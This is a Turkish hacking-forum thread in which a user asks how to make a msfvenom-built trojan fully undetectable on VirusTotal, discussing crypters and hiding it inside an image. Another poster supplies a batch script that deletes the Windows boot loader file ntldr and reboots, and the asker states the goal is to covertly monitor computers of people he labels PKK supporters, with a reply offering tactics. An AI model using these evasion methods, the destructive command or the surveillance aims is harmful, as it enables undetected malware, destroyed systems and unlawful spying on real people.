Hoşgeldin Misafir

Trojan için yardım?

cyberthereaper

19 Ocak 2018
193 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Herkeze selam arkadaşlar size bir soru sormak istiyorum. Şimdi mesala msfvenom ile yaptığımız bir trojanı virüs totale taratıyoruz. Diyelimki virüs total sonucu 59/1 :D :cool: olsun. Çıkan 1 sonucuda yok etmek için yani virüs total taramasında hiç virüslü bulmaması için ne yapabiliriz? Mesala birine sordum bir resim ile birleştir belki o 1 gider dedi.fakat henüz deneyemedim.sizin farklı bir düşünceniz varmı? İyi akşamlar?

cyberthereaper

19 Ocak 2018
193 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Hocam ceypter programlarının hepsini antivirüs programları yakalıyor. Şimdi ben 59/1 virüslü olan bir ğrogramı crypter programı ile fudlamayı çalışınca 59/12 oluyor.

Ben mesala 59/17 olan bir trojanı ben 59/1 yapıyorum.fakat bunu herhangibi bir trojan crypter programı ile yapmıyorum.farklı yöntemlerle bu virüsü düşürüyorum. Mesala birtane daha program kullanıyorum onda sıkıntı yok onunla hazırladuğım trojanlar 56/0 çıkıyor.dün yeni program bulayım dedim ve buldum onunla denedim. Oda trojanı 59/1 yaptı. Onu bulan virüs programının adıda dr.web diye bir virüs programı.inat oldum o 1 i ne yaptımsa düşüremedim.normal trojanlar için kullanılan xrypterler kullansam daha çok çıkar virüs oranı.

cyberthereaper

19 Ocak 2018
193 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
BayBars' Alıntı:
Açıkçası Kardeşim Resim Ile Birleştirmek Mantıklı Ve Bence O 1 İhtimal de Ortadan Kaybolur Diye Düşünüyorum.Benim Konularımdan Uygulamalı Öğrenmek İçin Yazdığım Konu:
http://www.turkhacks.com/konu-kript...ths-baybars-anlatiyor.html?pid=25482#pid25482
Bilgi Açısından Burdaki Link:
http://www.turkhacks.com/konu-stenografi-nedir-ths-baybars-anlatiyor.html

sağol bakmak lazım. ben yanlız trojanları crypterleme programları ile yaptığım trojanı fudlamıyorum. aklınıza dahi gelmeyecek bir program yöntemi ile fudluyorum. ben de brtane program var onunla trojanı fudlayınca 56/0 çıkıyor. ben aynı programın değişik isimlerine baktım aceba bu programın başka versiyonları olabilirmi diye başka bir program buldum onunla trojanı düzenledim . oda 59/1 çıktı.. fakat o 1 de dr.web diye hiç tanımadığım bir antivirüs programı buldu.ben 56/0 çıkan trojanın videosunu çektim .intro attım videoyaya müzik attım. tam youtube yükleyecektim vazgeçtim. kendi kendime demimki şimi bunu yüklerimm millte bunu patlatırlar. çünki bir programın duyulması ile o programın patlaması 1 ayı bulmuyır

SurHan

28 Kas 2017
4,186 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r

Bu Kodu .bat Olarak Yaparsan Pc Virüs İle Çöker.Forumda Yardım Gibi Konularda Yazı Yazmayın.Yasaktır.

cyberthereaper

19 Ocak 2018
193 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
[Back]

rm -rf /var/lib/apt/lists
apt-get update
apt-get install kali-archive-keyring

Amacım bir bilgisayarı çökertmek değildir.afrin operasyonu süresince birçok pkk yandaşı internette var.bunların bilgisayarını kontrol edip ne yaptıklarını ve kime ne yazdıklarını görmek bilgisayar çökertmekden çok faydalı olacaktr

SurHan

28 Kas 2017
4,186 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
cyberthereaper' Alıntı:
[Back]

apt-get update

Amacım bir bilgisayarı çökertmek değildir.afrin operasyonu süresince birçok pkk yandaşı internette var.bunların bilgisayarını kontrol edip ne yaptıklarını ve kime ne yazdıklarını görmek bilgisayar çökertmekden çok faydalı olacaktr

Onlar İçin Sana Taktikler verebilirim

cyberthereaper

19 Ocak 2018
193 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
EbulŞah' Alıntı:
cyberthereaper' Alıntı:
[Back]

apt-get update

Onlar İçin Sana Taktikler verebilirim

tabiki ..isterim...